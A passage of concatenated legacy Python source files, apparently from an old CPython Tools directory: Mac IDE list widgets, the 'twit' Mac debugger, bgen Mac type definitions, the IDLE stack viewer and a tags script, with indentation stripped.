rect = rect[0]+1, rect[1]+1, rect[2]-16, rect[3]-1
self._list = List.LNew(rect, (0, 0, self._cols, 0), (0, 0), self.LDEF_ID, self._parentwindow.wid,
0, 1, 0, 1)
if self.drawingmode:
self._list.LSetDrawingMode(0)
self._list.selFlags = self._flags
self.setitems(self.items)
if hasattr(self, "_sel"):
self.setselection(self._sel)
del self._sel
def adjust(self, oldbounds):
self.SetPort()
if self._selected:
Win.InvalRect(Qd.InsetRect(oldbounds, -3, -3))
Win.InvalRect(Qd.InsetRect(self._bounds, -3, -3))
else:
Win.InvalRect(oldbounds)
Win.InvalRect(self._bounds)
if oldbounds[:2] == self._bounds[:2]:
# set visRgn to empty, to prevent nasty drawing side effect of LSize()
Qd.RectRgn(self._parentwindow.wid.GetWindowPort().visRgn, (0, 0, 0, 0))
# list still has the same upper/left coordinates, use LSize
l, t, r, b = self._bounds
width = r - l - 17
height = b - t - 2
self._list.LSize(width, height)
# now *why* doesn't the list manager recalc the cellrect???
l, t, r, b = self._list.LRect((0,0))
cellheight = b - t
self._list.LCellSize((width, cellheight))
# reset visRgn
self._parentwindow.wid.CalcVis()
else:
# oh well, since the list manager doesn't have a LMove call,
# we have to make the list all over again...
sel = self.getselection()
topcell = self.gettopcell()
self._list = None
self.setdrawingmode(0)
self.createlist()
self.setselection(sel)
self.settopcell(topcell)
self.setdrawingmode(1)
def close(self):
self._list = None
self._callback = None
self.items[:] = []
Wbase.SelectableWidget.close(self)
def set(self, items):
self.setitems(items)
def setitems(self, items):
self.items = items
the_list = self._list
if not self._parent or not self._list:
return
self.setdrawingmode(0)
topcell = self.gettopcell()
the_list.LDelRow(0, 1)
the_list.LAddRow(len(self.items), 0)
self_itemrepr = self.itemrepr
set_cell = the_list.LSetCell
for i in range(len(items)):
set_cell(self_itemrepr(items[i]), (0, i))
self.settopcell(topcell)
self.setdrawingmode(1)
def click(self, point, modifiers):
if not self._enabled:
return
isdoubleclick = self._list.LClick(point, modifiers)
if self._callback:
Wbase.CallbackCall(self._callback, 0, isdoubleclick)
return 1
def key(self, char, event):
(what, message, when, where, modifiers) = event
sel = self.getselection()
newselection = []
if char == Wkeys.uparrowkey:
if len(sel) >= 1 and min(sel) > 0:
newselection = [min(sel) - 1]
else:
newselection = [0]
elif char == Wkeys.downarrowkey:
if len(sel) >= 1 and max(sel) < (len(self.items) - 1):
newselection = [max(sel) + 1]
else:
newselection = [len(self.items) - 1]
else:
modifiers = 0
if (self.lasttime + self.timelimit) < Evt.TickCount():
self.lasttyping = ""
self.lasttyping = self.lasttyping + string.lower(char)
self.lasttime = Evt.TickCount()
i = self.findmatch(self.lasttyping)
newselection = [i]
if modifiers & Events.shiftKey:
newselection = newselection + sel
self.setselection(newselection)
self._list.LAutoScroll()
self.click((-1, -1), 0)
def findmatch(self, tag):
lower = string.lower
items = self.items
taglen = len(tag)
match = '\377' * 100
match_i = -1
for i in range(len(items)):
item = lower(str(items[i]))
if tag <= item < match:
match = item
match_i = i
if match_i >= 0:
return match_i
else:
return len(items) - 1
def domenu_copy(self, *args):
sel = self.getselection()
selitems = []
for i in sel:
selitems.append(str(self.items[i]))
text = string.join(selitems, '\r')
if text:
Scrap.ZeroScrap()
Scrap.PutScrap('TEXT', text)
def can_copy(self, *args):
return len(self.getselection()) <> 0
def domenu_selectall(self, *args):
self.selectall()
def selectall(self):
self.setselection(range(len(self.items)))
self._list.LAutoScroll()
self.click((-1, -1), 0)
def getselection(self):
if not self._parent or not self._list:
if hasattr(self, "_sel"):
return self._sel
return []
items = []
point = (0,0)
while 1:
ok, point = self._list.LGetSelect(1, point)
if not ok:
break
items.append(point[1])
point = point[0], point[1]+1
return items
def setselection(self, selection):
if not self._parent or not self._list:
self._sel = selection
return
set_sel = self._list.LSetSelect
for i in range(len(self.items)):
if i in selection:
set_sel(1, (0, i))
else:
set_sel(0, (0, i))
self._list.LAutoScroll()
def getselectedobjects(self):
sel = self.getselection()
objects = []
for i in sel:
objects.append(self.items[i])
return objects
def setselectedobjects(self, objects):
sel = []
for o in objects:
try:
sel.append(self.items.index(o))
except:
pass
self.setselection(sel)
def gettopcell(self):
l, t, r, b = self._bounds
t = t + 1
cl, ct, cr, cb = self._list.LRect((0, 0))
cellheight = cb - ct
return (t - ct) / cellheight
def settopcell(self, topcell):
top = self.gettopcell()
diff = topcell - top
self._list.LScroll(0, diff)
def draw(self, visRgn = None):
if self._visible:
if not visRgn:
visRgn = self._parentwindow.wid.GetWindowPort().visRgn
self._list.LUpdate(visRgn)
Qd.FrameRect(self._bounds)
if self._selected and self._activated:
self.drawselframe(1)
def select(self, onoff, isclick = 0):
if Wbase.SelectableWidget.select(self, onoff):
return
self.SetPort()
self.drawselframe(onoff)
def activate(self, onoff):
self._activated = onoff
if self._visible:
self._list.LActivate(onoff)
if self._selected:
self.drawselframe(onoff)
def get(self):
return self.items
def itemrepr(self, item):
return str(item)[:255]
def __getitem__(self, index):
return self.items[index]
def __setitem__(self, index, item):
if self._parent and self._list:
self._list.LSetCell(self.itemrepr(item), (0, index))
self.items[index] = item
def __delitem__(self, index):
if self._parent and self._list:
self._list.LDelRow(1, index)
del self.items[index]
def __getslice__(self, a, b):
return self.items[a:b]
def __delslice__(self, a, b):
if b-a:
if self._parent and self._list:
self._list.LDelRow(b-a, a)
del self.items[a:b]
def __setslice__(self, a, b, items):
if self._parent and self._list:
l = len(items)
the_list = self._list
self.setdrawingmode(0)
if b-a:
if b > len(self.items):
# fix for new 1.5 "feature" where b is sys.maxint instead of len(self)...
# LDelRow doesn't like maxint.
b = len(self.items)
the_list.LDelRow(b-a, a)
the_list.LAddRow(l, a)
self_itemrepr = self.itemrepr
set_cell = the_list.LSetCell
for i in range(len(items)):
set_cell(self_itemrepr(items[i]), (0, i + a))
self.items[a:b] = items
self.setdrawingmode(1)
else:
self.items[a:b] = items
def __len__(self):
return len(self.items)
def append(self, item):
if self._parent and self._list:
index = len(self.items)
self._list.LAddRow(1, index)
self._list.LSetCell(self.itemrepr(item), (0, index))
self.items.append(item)
def remove(self, item):
index = self.items.index(item)
self.__delitem__(index)
def index(self, item):
return self.items.index(item)
def insert(self, index, item):
if index < 0:
index = 0
if self._parent and self._list:
self._list.LAddRow(1, index)
self._list.LSetCell(self.itemrepr(item), (0, index))
self.items.insert(index, item)
def setdrawingmode(self, onoff):
if onoff:
self.drawingmode = self.drawingmode - 1
if self.drawingmode == 0 and self._list is not None:
self._list.LSetDrawingMode(1)
if self._visible:
bounds = l, t, r, b = Qd.InsetRect(self._bounds, 1, 1)
cl, ct, cr, cb = self._list.LRect((0, len(self.items)-1))
if cb < b:
self.SetPort()
Qd.EraseRect((l, cb, cr, b))
self._list.LUpdate(self._parentwindow.wid.GetWindowPort().visRgn)
Win.ValidRect(bounds)
else:
if self.drawingmode == 0 and self._list is not None:
self._list.LSetDrawingMode(0)
self.drawingmode = self.drawingmode + 1
class TwoLineList(List):
LDEF_ID = 468
def createlist(self):
import List
self._calcbounds()
self.SetPort()
rect = self._bounds
rect = rect[0]+1, rect[1]+1, rect[2]-16, rect[3]-1
self._list = List.LNew(rect, (0, 0, 1, 0), (0, 28), self.LDEF_ID, self._parentwindow.wid,
0, 1, 0, 1)
self.set(self.items)
class ResultsWindow:
"""Simple results window. The user cannot make this window go away completely:
closing it will just hide it. It will remain in the windows list. The owner of this window
should call the done() method to indicate it's done with it.
"""
def __init__(self, possize=None, title="Results", callback=None):
import W
if possize is None:
possize = (500, 200)
self.w = W.Window(possize, title, minsize=(200, 100))
self.w.results = W.TwoLineList((-1, -1, 1, -14), callback=None)
self.w.bind("<close>", self.hide)
self.w.open()
self._done = 0
def done(self):
self._done = 1
if not self.w.isvisible():
self.w.close()
def hide(self):
if not self._done:
self.w.show(0)
return -1
def append(self, msg):
if not self.w.isvisible():
self.w.show(1)
self.w.select()
msg = string.replace(msg, '\n', '\r')
self.w.results.append(msg)
self.w.results.setselection([len(self.w.results)-1])
def __getattr__(self, attr):
return getattr(self.w.results, attr)
class MultiList(List):
"""XXX Experimantal!!!"""
def setitems(self, items):
self.items = items
if not self._parent or not self._list:
return
self._list.LDelRow(0, 1)
self.setdrawingmode(0)
self._list.LAddRow(len(self.items), 0)
self_itemrepr = self.itemrepr
set_cell = self._list.LSetCell
for i in range(len(items)):
row = items[i]
for j in range(len(row)):
item = row[j]
set_cell(self_itemrepr(item), (j, i))
self.setdrawingmode(1)
def getselection(self):
if not self._parent or not self._list:
if hasattr(self, "_sel"):
return self._sel
return []
items = []
point = (0,0)
while 1:
ok, point = self._list.LGetSelect(1, point)
if not ok:
break
items.append(point[1])
point = point[0], point[1]+1
return items
def setselection(self, selection):
if not self._parent or not self._list:
self._sel = selection
return
set_sel = self._list.LSetSelect
for i in range(len(self.items)):
if i in selection:
set_sel(1, (0, i))
else:
set_sel(0, (0, i))
#self._list.LAutoScroll()
```
#### File: Tools/IDE/W.py
```python
__version__ = "0.3"
from Wbase import *
from Wcontrols import *
from Wtext import *
from Wlists import *
from Wwindows import *
from Wmenus import *
_application = None
_signature = None
AlertError = 'AlertError'
def setapplication(app, sig):
global _application, _signature
_application = app
_signature = sig
def getapplication():
if _application is None:
raise WidgetsError, 'W not properly initialized: unknown Application'
return _application
def Message(text):
import EasyDialogs, Qd, string
Qd.InitCursor()
text = string.replace(text, "\n", "\r")
if not text:
text = '<Alert text not specified>'
EasyDialogs.Message(text)
```
#### File: Tools/macfreeze/macgen_info.py
```python
def generate(output, module_dict):
for name in module_dict.keys():
print 'Include %-20s\t'%name,
module = module_dict[name]
print module.gettype(), '\t', `module`
return 0
```
#### File: Tools/macfreeze/macgen_rsrc.py
```python
import EasyDialogs
import py_resource
import Res
import sys
def generate(output, module_dict, debug=0, preload=1):
fsid = py_resource.create(output)
for name, module in module_dict.items():
mtype = module.gettype()
if mtype not in ['module', 'package']:
continue
location = module.__file__
if location[-4:] == '.pyc':
# Attempt corresponding .py
location = location[:-1]
if location[-3:] != '.py':
print '*** skipping', location
continue
id, name = py_resource.frompyfile(location, name, preload=preload,
ispackage=mtype=='package')
if debug > 0:
print 'PYC resource %5d\t%s\t%s'%(id, name, location)
Res.CloseResFile(fsid)
def warnings(module_dict):
problems = 0
for name, module in module_dict.items():
if module.gettype() not in ('builtin', 'module', 'package'):
problems = problems + 1
print 'Warning: %s not included: %s %s'%(name, module.gettype(), module)
return problems
```
#### File: Tools/twit/mactwit_app.py
```python
import FrameWork
import MiniAEFrame
import EasyDialogs
import AE
import AppleEvents
import Res
import sys
import Qd
import Evt
import Events
import Dlg
import Win
import Menu
import TwitCore
import mactwit_mod
import mactwit_stack
import mactwit_browser
import mactwit_edit
import macfs
import string
# Resource-id (for checking existence)
ID_MODULES=500
ID_ABOUT=502
_arrow = Qd.qd.arrow
_watch = Qd.GetCursor(4).data
class Twit(FrameWork.Application, TwitCore.Application, MiniAEFrame.AEServer):
"""The twit main class - mac-dependent part"""
def __init__(self, sessiontype, arg=None):
# First init menus, etc.
self.app_menu_bar = Menu.GetMenuBar()
FrameWork.Application.__init__(self)
MiniAEFrame.AEServer.__init__(self)
AE.AESetInteractionAllowed(AppleEvents.kAEInteractWithAll)
self.installaehandler('aevt', 'odoc', self.ae_open_doc)
self.installaehandler('aevt', 'quit', self.do_quit)
self.installaehandler('pyth', 'EXEC', self.do_bbpyexec) # BBpy execute event
self.dbg_menu_bar = Menu.GetMenuBar()
self.setstate(sessiontype)
self._quitting = 0
self.real_quit = 0
self.window_aware = 1
# Next create our dialogs
self.mi_init(sessiontype, arg)
while 1:
if self.real_quit:
break
if self.initial_cmd:
self.to_debugger() # Will get to mainloop via debugger
else:
self.one_mainloop() # Else do it ourselves.
def switch_to_app(self):
if not self.window_aware:
return
self.dbg_menu_bar = Menu.GetMenuBar()
Menu.SetMenuBar(self.app_menu_bar)
Menu.DrawMenuBar()
def switch_to_dbg(self):
if not self.window_aware:
return
self.app_menu_bar = Menu.GetMenuBar()
Menu.SetMenuBar(self.dbg_menu_bar)
Menu.DrawMenuBar()
self.run_dialog.force_redraw()
if self.module_dialog:
self.module_dialog.force_redraw()
def makeusermenus(self):
self.filemenu = m = FrameWork.Menu(self.menubar, "Debug")
self._openitem = FrameWork.MenuItem(m, "Run File...", "O", self.do_open)
self._runitem = FrameWork.MenuItem(m, "Run String...", "R", self.do_run)
FrameWork.Separator(m)
self._awareitem = FrameWork.MenuItem(m, "Window-aware", "", self.do_aware)
self._awareitem.check(1)
FrameWork.Separator(m)
self._quititem = FrameWork.MenuItem(m, "Quit", "Q", self.do_quit)
self.controlmenu = m = FrameWork.Menu(self.menubar, "Control")
self._stepitem = FrameWork.MenuItem(m, "Step Next", "N", self.do_step)
self._stepinitem = FrameWork.MenuItem(m, "Step In", "S", self.do_stepin)
self._stepoutitem = FrameWork.MenuItem(m, "Step Out", "U", self.do_stepout)
self._continueitem = FrameWork.MenuItem(m, "Continue", "G", self.do_continue)
FrameWork.Separator(m)
self._killitem = FrameWork.MenuItem(m, "Kill", "K", self.do_kill)
def setstate(self, state):
self.state = state
if state == 'run':
self._stepitem.enable(1)
self._stepoutitem.enable(1)
self._stepinitem.enable(1)
self._continueitem.enable(1)
self._killitem.enable(1)
else:
self._stepitem.enable(0)
self._stepoutitem.enable(0)
self._stepinitem.enable(0)
self._continueitem.enable(0)
self._killitem.enable(0)
def asknewsession(self):
if self.state == 'none':
return 1
if EasyDialogs.AskYesNoCancel("Abort current debug session?") == 1:
self.quit_bdb()
return 1
return 0
def do_about(self, id, item, window, event):
import time
d = Dlg.GetNewDialog(ID_ABOUT, -1)
if not d:
return
w = d.GetDialogWindow()
port = w.GetWindowPort()
l, t, r, b = port.portRect
sl, st, sr, sb = Qd.qd.screenBits.bounds
x = ((sr-sl) - (r-l)) / 2
y = ((sb-st-16) - (b-t)) / 5
w.MoveWindow(x, y, 0)
w.ShowWindow()
d.DrawDialog()
tp, h, rect = d.GetDialogItem(2)
x0, y0, x1, y1 = rect
ybot = y0 + 32
rgn = Qd.NewRgn()
Qd.SetPort(d)
ok, evt = self.getevent(Events.mDownMask|Events.keyDownMask, 1)
if ok: return
(what, message, when, where, modifiers) = event
delta_t = 128
nexttime = when+delta_t
while ybot < y1:
# Do the animation, if it is time
if when > nexttime:
Qd.ScrollRect((x0, y0, x1, ybot), 0, 1, rgn)
y0 = y0 + 1
ybot = ybot + 1
# And update next time
delta_t = int(delta_t*0.6)-1
if delta_t < 0:
delta_t = 0
nexttime = when + delta_t
# Check for an event.
ok, evt = self.getevent(Events.mDownMask|Events.keyDownMask, 0)
if ok: return
(what, message, when, where, modifiers) = evt
while 1:
ok, evt = self.getevent(Events.mDownMask|Events.keyDownMask, -1)
if ok: return
def do_open(self, *args):
if not self.asknewsession():
return
fss, ok = macfs.StandardGetFile('TEXT')
if not ok: return
self.runfile(fss.as_pathname())
def ae_open_doc(self, object=None, **args):
if not object: return
if self.state <> 'none':
if AE.AEInteractWithUser(AppleEvents.kAEDefaultTimeout) == 0:
if not self.asknewsession():
return
if type(object) == type([]):
object = object[0]
fss, changed = object.Resolve()
self.runfile(fss.as_pathname())
def do_bbpyexec(self, object=None, NAME=None, **args):
if type(object) <> type(''):
if AE.AEInteractWithUser(AppleEvents.kAEDefaultTimeout) == 0:
EasyDialogs.Message('EXEC AppleEvent arg should be a string')
return
if self.state <> 'none':
if AE.AEInteractWithUser(AppleEvents.kAEDefaultTimeout) == 0:
if not self.asknewsession():
return
stuff = string.splitfields(object, '\r')
stuff = string.joinfields(stuff, '\n')
self.runstring(stuff)
def do_run(self, *args):
if not self.asknewsession():
return
self.run()
def do_aware(self, *args):
self.window_aware = not self.window_aware
self._awareitem.check(self.window_aware)
def do_quit(self, *args):
self._quit() # Signal FrameWork.Application to stop
self.real_quit = 1
self.quit_bdb() # Tell debugger to quit.
def do_step(self, *args):
self.run_dialog.click_step()
def do_stepin(self, *args):
self.run_dialog.click_step_in()
def do_stepout(self, *args):
self.run_dialog.click_step_out()
def do_continue(self, *args):
self.run_dialog.click_continue()
def do_kill(self, *args):
self.run_dialog.click_kill()
def exit_mainloop(self):
self._quit() # Signal FrameWork.Application to stop
self.real_quit = 0
def one_mainloop(self):
self.quitting = 0
self.mainloop()
def SetCursor(self):
Qd.SetCursor(_arrow)
def SetWatch(self):
Qd.SetCursor(_watch)
def AskString(self, *args):
return apply(EasyDialogs.AskString, args)
def Message(self, *args):
return apply(EasyDialogs.Message, args)
def new_module_browser(self, parent):
return mactwit_mod.ModuleBrowser(parent)
def new_stack_browser(self, parent):
return mactwit_stack.StackBrowser(parent)
def new_var_browser(self, parent, var):
return mactwit_browser.VarBrowser(parent).open(var)
def edit(self, file, line):
return mactwit_edit.edit(file, line)
def Initialize():
try:
# if this doesn't raise an error, we are an applet containing the
# necessary resources or we have been initialized already
# so we don't have to bother opening the resource file
dummy = Res.GetResource('DLOG', ID_MODULES)
except Res.Error:
try:
Res.OpenResFile("Twit.rsrc")
except Res.Error, arg:
EasyDialogs.Message("Cannot open Twit.rsrc: "+arg[1])
sys.exit(1)
```
#### File: Tools/twit/twit.py
```python
import os
import sys
# Add our directory to path, if needed
dirname = os.path.split(__file__)[0]
if not dirname in sys.path:
sys.path.append(dirname)
if os.name == 'mac':
import MacOS
MacOS.splash(502) # Try to show the splash screen
import mactwit_app; twit_app = mactwit_app
else:
try:
import _tkinter
have_tk = 1
except ImportError:
have_tk = 0
if have_tk:
import tktwit_app; twit_app = tktwit_app
else:
print 'Please implementent machine-dependent code and try again:-)'
sys.exit(1)
import sys
def main():
twit_app.Initialize()
if os.name == 'mac':
MacOS.splash()
twit_app.Twit('none', None)
def run(statement, globals=None, locals=None):
twit_app.Initialize()
twit_app.Twit('run', (statement, globals, locals))
def post_mortem(t):
Initialize()
twit_app.Twit('pm', t)
def pm():
post_mortem(sys.last_traceback)
if __name__ == '__main__':
main()
```
#### File: Tools/twit/twittest.py
```python
def foo(arg1, arg2):
bar(arg1+arg2)
bar(arg1-arg2)
foo(arg1+1, arg2-1)
def bar(arg):
rv = 10/arg
print rv
foo(0,10)
```
#### File: bgen/bgen/macsupport.py
```python
from bgen import *
# Simple types
Boolean = Type("Boolean", "b")
SignedByte = Type("SignedByte", "b")
ScriptCode = Type("ScriptCode", "h")
Size = Type("Size", "l")
Style = Type("Style", "b")
StyleParameter = Type("StyleParameter", "h")
CharParameter = Type("CharParameter", "h")
TextEncoding = Type("TextEncoding", "l")
UInt8 = Type("UInt8", "b")
SInt8 = Type("SInt8", "b")
UInt16 = Type("UInt16", "h")
SInt16 = Type("SInt16", "h")
UInt32 = Type("UInt32", "l")
SInt32 = Type("SInt32", "l")
# Pascal strings
ConstStr255Param = OpaqueArrayType("Str255", "PyMac_BuildStr255", "PyMac_GetStr255")
Str255 = OpaqueArrayType("Str255", "PyMac_BuildStr255", "PyMac_GetStr255")
# File System Specifications
FSSpec_ptr = OpaqueType("FSSpec", "PyMac_BuildFSSpec", "PyMac_GetFSSpec")
# OSType and ResType: 4-byte character strings
def OSTypeType(typename):
return OpaqueByValueType(typename, "PyMac_BuildOSType", "PyMac_GetOSType")
OSType = OSTypeType("OSType")
ResType = OSTypeType("ResType")
# Version numbers
NumVersion = OpaqueByValueType("NumVersion", "PyMac_BuildNumVersion", "BUG")
# Handles (always resources in our case)
Handle = OpaqueByValueType("Handle", "ResObj")
MenuHandle = OpaqueByValueType("MenuHandle", "MenuObj")
MenuRef = MenuHandle
ControlHandle = OpaqueByValueType("ControlHandle", "CtlObj")
ControlRef = ControlHandle
# Windows and Dialogs
WindowPtr = OpaqueByValueType("WindowPtr", "WinObj")
WindowRef = WindowPtr
DialogPtr = OpaqueByValueType("DialogPtr", "DlgObj")
DialogRef = DialogPtr
ExistingWindowPtr = OpaqueByValueType("WindowPtr", "WinObj_WhichWindow", "BUG")
ExistingDialogPtr = OpaqueByValueType("DialogPtr", "WinObj_WhichWindow", "BUG")
# NULL pointer passed in as optional storage -- not present in Python version
NullStorage = FakeType("(void *)0")
# More standard datatypes
Fixed = OpaqueByValueType("Fixed", "PyMac_BuildFixed", "PyMac_GetFixed")
# Quickdraw data types
Rect = Rect_ptr = OpaqueType("Rect", "PyMac_BuildRect", "PyMac_GetRect")
Point = OpaqueByValueType("Point", "PyMac_BuildPoint", "PyMac_GetPoint")
# Event records
EventRecord = OpaqueType("EventRecord", "PyMac_BuildEventRecord", "PyMac_GetEventRecord")
EventRecord_ptr = EventRecord
# OSErr is special because it is turned into an exception
# (Could do this with less code using a variant of mkvalue("O&")?)
class OSErrType(Type):
def errorCheck(self, name):
Output("if (%s != noErr) return PyMac_Error(%s);", name, name)
self.used = 1
OSErr = OSErrType("OSErr", 'h')
OSStatus = OSErrType("OSStatus", 'l')
# Various buffer types
InBuffer = VarInputBufferType('char', 'long', 'l') # (buf, len)
InOutBuffer = HeapInputOutputBufferType('char', 'long', 'l') # (inbuf, outbuf, len)
VarInOutBuffer = VarHeapInputOutputBufferType('char', 'long', 'l') # (inbuf, outbuf, &len)
OutBuffer = HeapOutputBufferType('char', 'long', 'l') # (buf, len)
VarOutBuffer = VarHeapOutputBufferType('char', 'long', 'l') # (buf, &len)
VarVarOutBuffer = VarVarHeapOutputBufferType('char', 'long', 'l') # (buf, len, &len)
# Predefine various pieces of program text to be passed to Module() later:
# Stuff added immediately after the system include files
includestuff = """
#define SystemSevenOrLater 1
#include "macglue.h"
#include <Memory.h>
#include <Dialogs.h>
#include <Menus.h>
#include <Controls.h>
extern PyObject *ResObj_New(Handle);
extern int ResObj_Convert(PyObject *, Handle *);
extern PyObject *OptResObj_New(Handle);
extern int OptResObj_Convert(PyObject *, Handle *);
extern PyObject *WinObj_New(WindowPtr);
extern int WinObj_Convert(PyObject *, WindowPtr *);
extern PyTypeObject Window_Type;
#define WinObj_Check(x) ((x)->ob_type == &Window_Type)
extern PyObject *DlgObj_New(DialogPtr);
extern int DlgObj_Convert(PyObject *, DialogPtr *);
extern PyTypeObject Dialog_Type;
#define DlgObj_Check(x) ((x)->ob_type == &Dialog_Type)
extern PyObject *MenuObj_New(MenuHandle);
extern int MenuObj_Convert(PyObject *, MenuHandle *);
extern PyObject *CtlObj_New(ControlHandle);
extern int CtlObj_Convert(PyObject *, ControlHandle *);
extern PyObject *GrafObj_New(GrafPtr);
extern int GrafObj_Convert(PyObject *, GrafPtr *);
extern PyObject *BMObj_New(BitMapPtr);
extern int BMObj_Convert(PyObject *, BitMapPtr *);
extern PyObject *WinObj_WhichWindow(WindowPtr);
"""
# Stuff added just before the module's init function
finalstuff = """
"""
# Stuff added inside the module's init function
initstuff = """
"""
# Generator classes with a twist -- if the function returns OSErr,
# its mode is manipulated so that it turns into an exception or disappears
# (and its name is changed to _err, for documentation purposes).
# This requires that the OSErr type (defined above) has a non-trivial
# errorCheck method.
class OSErrMixIn:
"Mix-in class to treat OSErr/OSStatus return values special"
def makereturnvar(self):
if self.returntype.__class__ == OSErrType:
return Variable(self.returntype, "_err", ErrorMode)
else:
return Variable(self.returntype, "_rv", OutMode)
class OSErrFunctionGenerator(OSErrMixIn, FunctionGenerator): pass
class OSErrMethodGenerator(OSErrMixIn, MethodGenerator): pass
class MacModule(Module):
"Subclass which gets the exception initializer from macglue.c"
def exceptionInitializer(self):
return "PyMac_GetOSErrException()"
_SetOutputFileName = SetOutputFileName # Save original
def SetOutputFileName(file = None):
"Set the output file name and set its creator&type to CWIE&TEXT"
_SetOutputFileName(file)
if file:
import MacOS
MacOS.SetCreatorAndType(file, 'CWIE', 'TEXT')
```
#### File: Tools/idle/StackViewer.py
```python
import string
import sys
import os
from Tkinter import *
import linecache
from repr import Repr
from WindowList import ListedToplevel
from ScrolledList import ScrolledList
class StackBrowser:
def __init__(self, root, flist, stack=None):
self.top = top = ListedToplevel(root)
top.protocol("WM_DELETE_WINDOW", self.close)
top.bind("<Key-Escape>", self.close)
top.wm_title("Stack viewer")
top.wm_iconname("Stack")
# Create help label
self.helplabel = Label(top,
text="Click once to view variables; twice for source",
borderwidth=2, relief="groove")
self.helplabel.pack(fill="x")
#
self.sv = StackViewer(top, flist, self)
if stack is None:
stack = get_stack()
self.sv.load_stack(stack)
def close(self, event=None):
self.top.destroy()
localsframe = None
localsviewer = None
localsdict = None
globalsframe = None
globalsviewer = None
globalsdict = None
curframe = None
def show_frame(self, (frame, lineno)):
if frame is self.curframe:
return
self.curframe = None
if frame.f_globals is not self.globalsdict:
self.show_globals(frame)
self.show_locals(frame)
self.curframe = frame
def show_globals(self, frame):
title = "Global Variables"
if frame.f_globals.has_key("__name__"):
try:
name = str(frame.f_globals["__name__"]) + ""
except:
name = ""
if name:
title = title + " in module " + name
self.globalsdict = None
if self.globalsviewer:
self.globalsviewer.close()
self.globalsviewer = None
if not self.globalsframe:
self.globalsframe = Frame(self.top)
self.globalsdict = frame.f_globals
self.globalsviewer = NamespaceViewer(
self.globalsframe,
title,
self.globalsdict)
self.globalsframe.pack(fill="both", side="bottom")
def show_locals(self, frame):
self.localsdict = None
if self.localsviewer:
self.localsviewer.close()
self.localsviewer = None
if frame.f_locals is not frame.f_globals:
title = "Local Variables"
code = frame.f_code
funcname = code.co_name
if funcname not in ("?", "", None):
title = title + " in " + funcname
if not self.localsframe:
self.localsframe = Frame(self.top)
self.localsdict = frame.f_locals
self.localsviewer = NamespaceViewer(
self.localsframe,
title,
self.localsdict)
self.localsframe.pack(fill="both", side="top")
else:
if self.localsframe:
self.localsframe.forget()
class StackViewer(ScrolledList):
def __init__(self, master, flist, browser):
ScrolledList.__init__(self, master)
self.flist = flist
self.browser = browser
self.stack = []
def load_stack(self, stack, index=None):
self.stack = stack
self.clear()
## if len(stack) > 10:
## l["height"] = 10
## self.topframe.pack(expand=1)
## else:
## l["height"] = len(stack)
## self.topframe.pack(expand=0)
for i in range(len(stack)):
frame, lineno = stack[i]
try:
modname = frame.f_globals["__name__"]
except:
modname = "?"
code = frame.f_code
filename = code.co_filename
funcname = code.co_name
sourceline = linecache.getline(filename, lineno)
sourceline = string.strip(sourceline)
if funcname in ("?", "", None):
item = "%s, line %d: %s" % (modname, lineno, sourceline)
else:
item = "%s.%s(), line %d: %s" % (modname, funcname,
lineno, sourceline)
if i == index:
item = "> " + item
self.append(item)
if index is not None:
self.select(index)
def popup_event(self, event):
if self.stack:
return ScrolledList.popup_event(self, event)
def fill_menu(self):
menu = self.menu
menu.add_command(label="Go to source line",
command=self.goto_source_line)
menu.add_command(label="Show stack frame",
command=self.show_stack_frame)
def on_select(self, index):
if 0 <= index < len(self.stack):
self.browser.show_frame(self.stack[index])
def on_double(self, index):
self.show_source(index)
def goto_source_line(self):
index = self.listbox.index("active")
self.show_source(index)
def show_stack_frame(self):
index = self.listbox.index("active")
if 0 <= index < len(self.stack):
self.browser.show_frame(self.stack[index])
def show_source(self, index):
if not (0 <= index < len(self.stack)):
return
frame, lineno = self.stack[index]
code = frame.f_code
filename = code.co_filename
if os.path.isfile(filename):
edit = self.flist.open(filename)
if edit:
edit.gotoline(lineno)
def get_stack(t=None, f=None):
if t is None:
t = sys.last_traceback
stack = []
if t and t.tb_frame is f:
t = t.tb_next
while f is not None:
stack.append((f, f.f_lineno))
if f is self.botframe:
break
f = f.f_back
stack.reverse()
while t is not None:
stack.append((t.tb_frame, t.tb_lineno))
t = t.tb_next
return stack
def getexception(type=None, value=None):
if type is None:
type = sys.last_type
value = sys.last_value
if hasattr(type, "__name__"):
type = type.__name__
s = str(type)
if value is not None:
s = s + ": " + str(value)
return s
class NamespaceViewer:
def __init__(self, master, title, dict=None):
width = 0
height = 40
if dict:
height = 20*len(dict) # XXX 20 == observed height of Entry widget
self.master = master
self.title = title
self.repr = Repr()
self.repr.maxstring = 60
self.repr.maxother = 60
self.frame = frame = Frame(master)
self.frame.pack(expand=1, fill="both")
self.label = Label(frame, text=title, borderwidth=2, relief="groove")
self.label.pack(fill="x")
self.vbar = vbar = Scrollbar(frame, name="vbar")
vbar.pack(side="right", fill="y")
self.canvas = canvas = Canvas(frame,
height=min(300, max(40, height)),
scrollregion=(0, 0, width, height))
canvas.pack(side="left", fill="both", expand=1)
vbar["command"] = canvas.yview
canvas["yscrollcommand"] = vbar.set
self.subframe = subframe = Frame(canvas)
self.sfid = canvas.create_window(0, 0, window=subframe, anchor="nw")
self.load_dict(dict)
dict = -1
def load_dict(self, dict, force=0):
if dict is self.dict and not force:
return
subframe = self.subframe
frame = self.frame
for c in subframe.children.values():
c.destroy()
self.dict = None
if not dict:
l = Label(subframe, text="None")
l.grid(row=0, column=0)
else:
names = dict.keys()
names.sort()
row = 0
for name in names:
value = dict[name]
svalue = self.repr.repr(value) # repr(value)
l = Label(subframe, text=name)
l.grid(row=row, column=0, sticky="nw")
## l = Label(subframe, text=svalue, justify="l", wraplength=300)
l = Entry(subframe, width=0, borderwidth=0)
l.insert(0, svalue)
## l["state"] = "disabled"
l.grid(row=row, column=1, sticky="nw")
row = row+1
self.dict = dict
# XXX Could we use a <Configure> callback for the following?
subframe.update_idletasks() # Alas!
width = subframe.winfo_reqwidth()
height = subframe.winfo_reqheight()
canvas = self.canvas
self.canvas["scrollregion"] = (0, 0, width, height)
if height > 300:
canvas["height"] = 300
frame.pack(expand=1)
else:
canvas["height"] = height
frame.pack(expand=0)
def close(self):
self.frame.destroy()
```
#### File: Tools/scripts/eptags.py
```python
import sys
import regex
def main():
outfp = open('TAGS', 'w')
args = sys.argv[1:]
for file in args:
treat_file(file, outfp)
expr = '^[ \t]*\(def\|class\)[ \t]+\([a-zA-Z0-9_]+\)[ \t]*[:(]'
matcher = regex.compile(expr)
def treat_file(file, outfp):
try:
fp = open(file, 'r')
except:
print 'Cannot open', file
return
charno = 0
lineno = 0
tags = []
size = 0
while 1:
line = fp.readline()
if not line: break
lineno = lineno + 1
